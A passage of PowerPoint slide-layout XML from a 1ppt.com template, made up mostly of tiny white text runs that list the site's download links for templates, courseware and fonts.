              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout124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24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24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24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2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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout125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25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25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25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25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25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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout125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25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25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25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2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26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26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26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26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26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26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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
